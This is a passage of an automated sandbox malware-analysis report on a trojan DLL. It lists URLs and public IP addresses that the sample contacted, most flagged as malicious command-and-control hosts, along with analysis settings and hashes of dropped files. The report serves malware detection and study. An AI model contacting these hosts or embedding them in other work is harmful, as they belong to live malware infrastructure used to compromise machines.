                                                                  https://www.pango.co/privacysvchost.exe, 00000017.00000003.392127513.0000015C8A7B4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.391991165.0000015C8A795000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392087236.0000015C8A792000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392152187.0000015C8AC02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392175741.0000015C8AC03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392461273.0000015C8AC19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392344061.0000015C8A7B4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.392106913.0000015C8A7A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://149.56.128.192/regsvr32.exe, 00000006.00000003.365060100.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.728320680.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.410742618.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762137969.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508876930.0000000002BEA000.00000004.00000020.00020000.00000000.sdmptrue
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  https://159.8.59.82:8080/AgctwBgxIsTEnzPyqHwVtfcFBregsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  https://www.tiktok.com/legal/reportsvchost.exe, 00000017.00000003.400782206.0000015C8A792000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://103.221.221.247/Globalregsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  https://79.172.212.2167:8080/regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		low
                                                                  https://120.50.40.183:80/zaregsvr32.exe, 00000006.00000003.410793511.0000000002C64000.00000004.00000020.00020000.00000000.sdmptrue
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000E.00000002.314128119.000001ECDFA3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://46.55.222.11/regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508921722.0000000002C1F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    https://46.55.222.11/TBwKHjQjVeCWIQFS)regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000E.00000003.313783832.000001ECDFA60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000017.00000003.396728134.0000015C8A792000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://120.50.40.183/dregsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://160.16.218.63:8080/5regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://103.221.221.247:8080/PosEzINMiHgCPAexqpnbXngfJaZeCEEsiTgLErregsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://58.227.42.236:80/regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://103.221.221.247/regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://103.221.221.247:8080/PosEzINMiHgCPAexqpnbXngfJaZeCEEsiTgLEregsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://120.50.40.183/mregsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.502288144.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://103.221.221.247:8080/iregsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://79.172.212.216:8080/regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.623436726.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.508820797.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000E.00000002.314163787.000001ECDFA5C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.313794156.000001ECDFA5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.313814458.000001ECDFA40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://185.157.82.211:8080/regsvr32.exe, 00000006.00000003.728224099.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.762473776.0000000002C2A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                        • Avira URL Cloud: malware
                                                                        		unknown

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        217.182.25.250
                                                                        		unknownFrance
                                                                        		16276OVHFRtrue
                                                                        79.172.212.216
                                                                        		unknownHungary
                                                                        		61998SZERVERPLEXHUtrue
                                                                        151.106.112.196
                                                                        		unknownGermany
                                                                        		61157PLUSSERVER-ASN1DEtrue
                                                                        110.232.117.186
                                                                        		unknownAustralia
                                                                        		56038RACKCORP-APRackCorpAUtrue
                                                                        51.254.140.238
                                                                        		unknownFrance
                                                                        		16276OVHFRtrue
                                                                        173.254.208.91
                                                                        		unknownUnited States
                                                                        		8100ASN-QUADRANET-GLOBALUStrue
                                                                        206.188.212.92
                                                                        		unknownUnited States
                                                                        		55002DEFENSE-NETUStrue
                                                                        45.118.115.99
                                                                        		unknownIndonesia
                                                                        		131717IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaIDtrue
                                                                        209.126.98.206
                                                                        		unknownUnited States
                                                                        		30083AS-30083-GO-DADDY-COM-LLCUStrue
                                                                        1.234.21.73
                                                                        		unknownKorea Republic of
                                                                        		9318SKB-ASSKBroadbandCoLtdKRtrue
                                                                        149.56.128.192
                                                                        		unknownCanada
                                                                        		16276OVHFRtrue
                                                                        176.56.128.118
                                                                        		unknownSwitzerland
                                                                        		12637SEEWEBWebhostingcolocationandcloudservicesITtrue
                                                                        45.118.135.203
                                                                        		unknownJapan63949LINODE-APLinodeLLCUStrue
                                                                        167.99.115.35
                                                                        		unknownUnited States
                                                                        		14061DIGITALOCEAN-ASNUStrue
                                                                        185.8.212.130
                                                                        		unknownUzbekistan
                                                                        		48979UZINFOCOMUZtrue
                                                                        197.242.150.244
                                                                        		unknownSouth Africa
                                                                        		37611AfrihostZAtrue
                                                                        51.91.76.89
                                                                        		unknownFrance
                                                                        		16276OVHFRtrue
                                                                        178.79.147.66
                                                                        		unknownUnited Kingdom
                                                                        		63949LINODE-APLinodeLLCUStrue
                                                                        207.38.84.195
                                                                        		unknownUnited States
                                                                        		30083AS-30083-GO-DADDY-COM-LLCUStrue
                                                                        164.68.99.3
                                                                        		unknownGermany
                                                                        		51167CONTABODEtrue
                                                                        189.126.111.200
                                                                        		unknownBrazil
                                                                        		27715LocawebServicosdeInternetSABRtrue
                                                                        146.59.226.45
                                                                        		unknownNorway
                                                                        		16276OVHFRtrue
                                                                        120.50.40.183
                                                                        		unknownSingapore
                                                                        		17547M1NET-SG-APM1NETLTDSGtrue
                                                                        58.227.42.236
                                                                        		unknownKorea Republic of
                                                                        		9318SKB-ASSKBroadbandCoLtdKRtrue
                                                                        158.69.222.101
                                                                        		unknownCanada
                                                                        		16276OVHFRtrue
                                                                        196.218.30.83
                                                                        		unknownEgypt
                                                                        		8452TE-ASTE-ASEGtrue
                                                                        101.50.0.91
                                                                        		unknownIndonesia
                                                                        		55688BEON-AS-IDPTBeonIntermediaIDtrue
                                                                        195.154.133.20
                                                                        		unknownFrance
                                                                        		12876OnlineSASFRtrue
                                                                        185.157.82.211
                                                                        		unknownPoland
                                                                        		42927S-NET-ASPLtrue
                                                                        103.43.46.182
                                                                        		unknownIndonesia
                                                                        		58397INFINYS-AS-IDPTInfinysSystemIndonesiaIDtrue
                                                                        212.237.17.99
                                                                        		unknownItaly
                                                                        		31034ARUBA-ASNITtrue
                                                                        212.24.98.99
                                                                        		unknownLithuania
                                                                        		62282RACKRAYUABRakrejusLTtrue
                                                                        138.185.72.26
                                                                        		unknownBrazil
                                                                        		264343EmpasoftLtdaMeBRtrue
                                                                        103.75.201.2
                                                                        		unknownThailand
                                                                        		133496CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTHtrue
                                                                        216.158.226.206
                                                                        		unknownUnited States
                                                                        		19318IS-AS-1UStrue
                                                                        103.75.201.4
                                                                        		unknownThailand
                                                                        		133496CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTHtrue
                                                                        51.91.7.5
                                                                        		unknownFrance
                                                                        		16276OVHFRtrue
                                                                        5.9.116.246
                                                                        		unknownGermany
                                                                        		24940HETZNER-ASDEtrue
                                                                        188.44.20.25
                                                                        		unknownMacedonia
                                                                        		57374GIV-ASMKtrue
                                                                        72.15.201.15
                                                                        		unknownUnited States
                                                                        		13649ASN-VINSUStrue
                                                                        209.250.246.206
                                                                        		unknownEuropean Union
                                                                        		20473AS-CHOOPAUStrue
                                                                        82.165.152.127
                                                                        		unknownGermany
                                                                        		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                        107.182.225.142
                                                                        		unknownUnited States
                                                                        		32780HOSTINGSERVICES-INCUStrue
                                                                        50.116.54.215
                                                                        		unknownUnited States
                                                                        		63949LINODE-APLinodeLLCUStrue
                                                                        131.100.24.231
                                                                        		unknownBrazil
                                                                        		61635GOPLEXTELECOMUNICACOESEINTERNETLTDA-MEBRtrue
                                                                        46.55.222.11
                                                                        		unknownBulgaria
                                                                        		34841BALCHIKNETBGtrue
                                                                        173.212.193.249
                                                                        		unknownGermany
                                                                        		51167CONTABODEtrue
                                                                        160.16.218.63
                                                                        		unknownJapan9370SAKURA-BSAKURAInternetIncJPtrue
                                                                        192.99.251.50
                                                                        		unknownCanada
                                                                        		16276OVHFRtrue
                                                                        45.142.114.231
                                                                        		unknownGermany
                                                                        		44066DE-FIRSTCOLOwwwfirst-colonetDEtrue
                                                                        203.114.109.124
                                                                        		unknownThailand
                                                                        		131293TOT-LLI-AS-APTOTPublicCompanyLimitedTHtrue
                                                                        1.234.2.232
                                                                        		unknownKorea Republic of
                                                                        		9318SKB-ASSKBroadbandCoLtdKRtrue
                                                                        119.193.124.41
                                                                        		unknownKorea Republic of
                                                                        		4766KIXS-AS-KRKoreaTelecomKRtrue
                                                                        159.8.59.82
                                                                        		unknownUnited States
                                                                        		36351SOFTLAYERUStrue
                                                                        129.232.188.93
                                                                        		unknownSouth Africa
                                                                        		37153xneeloZAtrue
                                                                        103.221.221.247
                                                                        		unknownViet Nam
                                                                        		18403FPT-AS-APTheCorporationforFinancingPromotingTechnolotrue

                                                                        Private

                                                                        IP
                                                                        127.0.0.1

                                                                        General Information

                                                                        Joe Sandbox Version:35.0.0 Citrine
                                                                        Analysis ID:669356
                                                                        Start date and time: 20/07/202200:18:102022-07-20 00:18:10 +02:00
                                                                        Joe Sandbox Product:CloudBasic
                                                                        Overall analysis duration:0h 11m 34s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:light
                                                                        Sample file name:psIFSn7VLi (renamed file extension from none to dll)
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                        Number of analysed new started processes analysed:37
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • HDC enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.evad.winDLL@29/8@2/57
                                                                        EGA Information:
                                                                        • Successful, ratio: 100%
                                                                        HDC Information:
                                                                        • Successful, ratio: 4.4% (good quality ratio 4.4%)
                                                                        • Quality average: 76.6%
                                                                        • Quality standard deviation: 22.5%
                                                                        HCA Information:
                                                                        • Successful, ratio: 91%
                                                                        • Number of executed functions: 0
                                                                        • Number of non-executed functions: 0
                                                                        Cookbook Comments:
                                                                        • Adjust boot time
                                                                        • Enable AMSI
                                                                        • Override analysis time to 240s for rundll32

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, wuapihost.exe
                                                                        • TCP Packets have been reduced to 100
                                                                        • Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.223.24.244, 20.101.57.9, 173.222.108.226, 173.222.108.210
                                                                        • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, twc.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        00:20:14API Interceptor11x Sleep call for process: svchost.exe modified
                                                                        00:21:06API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        No context

                                                                        Domains

                                                                        No context

                                                                        ASNs

                                                                        No context

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):8192
                                                                        Entropy (8bit):0.3593198815979092
                                                                        Encrypted:false
                                                                        SSDEEP:12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
                                                                        MD5:BF1DC7D5D8DAD7478F426DF8B3F8BAA6
                                                                        SHA1:C6B0BDE788F553F865D65F773D8F6A3546887E42
                                                                        SHA-256:BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
                                                                        SHA-512:00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
                                                                        Malicious:false
                                                                        Preview:.............*..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................*.............................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:MPEG-4 LOAS
                                                                        Category:dropped
                                                                        Size (bytes):1310720
                                                                        Entropy (8bit):0.2494928717330494
                                                                        Encrypted:false
                                                                        SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4x:BJiRdwfu2SRU4x
                                                                        MD5:3D91D4A83C1B6F065358FA986110242A
                                                                        SHA1:A0AC2BE6995DCF01B89039F1C97168808F456B0F
                                                                        SHA-256:80CB09C3431509834A9E4517255D1BB7D3177C6CFCFEB72FDDC4E038474EB6B7
                                                                        SHA-512:6954EE03DC112F91B73EA143C4D8622A65BBF8873367509972B0F19E4173A486E6356D2710FBD1DD6CDCCB7D0440ACC2375D968DCA2D4E14EB3FDD05EEA38277
                                                                        Malicious:false
                                                                        Preview:V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xa177ce27, page size 16384, Windows version 10.0
                                                                        Category:dropped
                                                                        Size (bytes):786432
                                                                        Entropy (8bit):0.25073483444406297
                                                                        Encrypted:false
                                                                        SSDEEP:384:ADx+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:AD6SB2nSB2RSjlK/+mLesOj1J2
                                                                        MD5:94E45D2F6F749C93765E0DDA0F17BDF2
                                                                        SHA1:0C29628147AAC83078B813FBEF699B9D90A684F9
                                                                        SHA-256:CBC1104D1BEB99BF3A8FF52638D40BC573C51C9E122A1C006ADDE3F5CD2064E4
                                                                        SHA-512:D0C0BAC72ECE21C6F546ACBF5772E6088EE9DE1E71E98748265114227AC72813E3981890291656A8CB03091C7F45799A77BE3E000DD2C61BD26660C2BF1C09CB
                                                                        Malicious:false
                                                                        Preview:.w.'... ................e.f.3...w........................)..........z.......z7.h.(..........z....)..............3...w...........................................................................................................B...........@...................................................................................................... ...................................................................................................................................................................................................................................................{._.....z...................VT......z..........................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):16384
                                                                        Entropy (8bit):0.0772493274986158
                                                                        Encrypted:false
                                                                        SSDEEP:3:l8/J7vr1FfSt9ya3tlrvOMhaP79gotlall3Vkttlmlnl:q/JrpliystxvOMhOSotA3
                                                                        MD5:695C49A2EAB2D0C08CA3DEA4450FFA28
                                                                        SHA1:D85409F6A75D18996E527E8C64F6AE02E590DEF2
                                                                        SHA-256:62DA00B081C60764FFEDC4183FAB22C630BF8993C71C81876454E9CE30FB1985
                                                                        SHA-512:30F1E3FB0CA2D462DD029BDDDAD3EF110CC9AA26EADEA44D66A4A0B4145D68B8A5E317FEA04FAD13B9A51DC1852CE6F02D3A81636F84E864417714C370184DE9
                                                                        Malicious:false
                                                                        Preview:N........................................3...w.......z7......z...............z.......z..oHR1.....z...................VT......z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                        File Type:Microsoft Cabinet archive data, 61712 bytes, 1 file
                                                                        Category:dropped
                                                                        Size (bytes):61712
                                                                        Entropy (8bit):7.995044632446497
                                                                        Encrypted:true
                                                                        SSDEEP:1536:gzjJiDImMsrjCtGLaexX/zL09mX/lZHIxs:gPJiDI/sr0Hexv/0S/zx
                                                                        MD5:589C442FC7A0C70DCA927115A700D41E
                                                                        SHA1:66A07DACE3AFBFD1AA07A47E6875BEAB62C4BB31
                                                                        SHA-256:2E5CB72E9EB43BAAFB6C6BFCC573AAC92F49A8064C483F9D378A9E8E781A526A
                                                                        SHA-512:1B5FA79E52BE495C42CF49618441FB7012E28C02E7A08A91DA9213DB3AB810F0E83485BC1DD5F625A47D0BA7CFCDD5EA50ACC9A8DCEBB39F048C40F01E94155B
                                                                        Malicious:false
                                                                        Preview:MSCF............,...................I........y.........Tf. .authroot.stl..W.`.4..CK..8U[...q.yL'sf!d.D..."2.2g.<dVI.!.....$).\...!2s..(...[.T7..{}...g....g.....w.km$.&|..qe.n.8+..&...O...`...+..C......`h!0.I.(C..1Q*L.p..".s..B.....H......fUP@..5...(X#.t.2lX.>.y|D.0Z0...M....I(.#.-... ...(.J....2..`.hO..{l+.bd7y.j..u.....3....<......3....s.T...._.'...%{v...s..............KgV.0..X=.A.9w9.Ea.x..........\.=.e.C2......9.......`.o... .......@pm.. a.....-M.....{...s.mW.....;.+...A......0.g..L9#.v.&O>./xSH.S.....GH.6.j...`2.(0g..... Lt........h4.iQ?....[.K.....uI......}.....d....M.....6q.Q~.0.\.'U^)`..u.....-........d..7...2.-.2+3.....A./.%Q...k...Q.,...H.B.%..O..x..5\...Hk.......B.';"Ym.'....X.l.E.6..a8.6..nq..x.r4..1t.....,..u.O..O.L...Uf...X.u.F .(.(.....".q...n{%U.-u....l6!....Z....~o0.}Q'.s.i....7...>4x...A.h.Mk].O.z.].6...53...b^;..>e..x.'1..\p.O.k..B1w..|..K.R.....2.e0..X.^...I...w..!.v5B]x..z.6.G^uF..].b.W...'..I.;..p..@L{.E..@W..3.&...

                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\regsvr32.exe
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):326
                                                                        Entropy (8bit):3.121306049522698
                                                                        Encrypted:false
                                                                        SSDEEP:6:kKBS+N+SkQlPlEGYRMY9z+4KlDA3RUeWlEZ21:ZSNkPlE99SNxAhUeE1
                                                                        MD5:8C805CA8388ED7564AE2D643484357C1
                                                                        SHA1:82992A0F1A252890B517A599B0B66AC44926A921
                                                                        SHA-256:B9D9177E44D666D349EA53968BD511402CF2E2CF487C04242FB12DC151DBE002
                                                                        SHA-512:36722B8C78653E9A76ADFB670436C10359216EB3EF25A75A46E469800AD5BB9BB031697D4B27EE4480A2741C9A999C943EA4937C8612F4F5D72BA56C15FF00A7
                                                                        Malicious:false
                                                                        Preview:p...... ........ .U(....(....................................................... .........L.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.9.f.4.c.9.6.9.8.b.d.8.1.:.0."...

                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):55
                                                                        Entropy (8bit):4.306461250274409
                                                                        Encrypted:false
                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                        Malicious:false
                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

                                                                        Download File
                                                                        Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                        Category:modified
                                                                        Size (bytes):10844
                                                                        Entropy (8bit):3.1599156166361886
                                                                        Encrypted:false
                                                                        SSDEEP:192:cY+38+DJM+i2Jt+iDQ+yw+f0+rU+0Jtk+EOtF+E7tC+EwA+7:j+s+i+Z+z+B+c+Y+0g+J+j+k+7
                                                                        MD5:E9D22BA72359D2558BAD28E242D6255A
                                                                        SHA1:EB5A07FD2FADDF063DAD88BD070C78849723BED0
                                                                        SHA-256:B3B00BE08644293309D5276071EAD74262B01EFE51AFAFE036767614544F80C6
